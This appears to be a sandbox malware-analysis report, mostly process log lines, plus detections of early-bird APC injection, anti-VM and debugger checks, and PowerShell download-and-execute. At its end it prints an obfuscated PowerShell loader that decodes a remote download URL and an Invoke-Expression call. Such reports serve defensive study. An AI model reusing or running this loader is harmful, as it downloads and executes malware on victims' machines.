Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5436	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4416	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5836	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3864	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160	Thread sleep time: -5534023222112862s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2072	Thread sleep time: -7378697629483816s >= -30000s			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: msiexec.exe, 00000007.00000002.2851401747.000000000594A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: powershell.exe, 00000005.00000002.2463994877.0000000006DC2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2851401747.00000000059A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.2036618357.00000192E5E70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V
Source: powershell.exe, 00000002.00000002.2271865944.000002E075C6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_1900.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTR

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3660000

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr 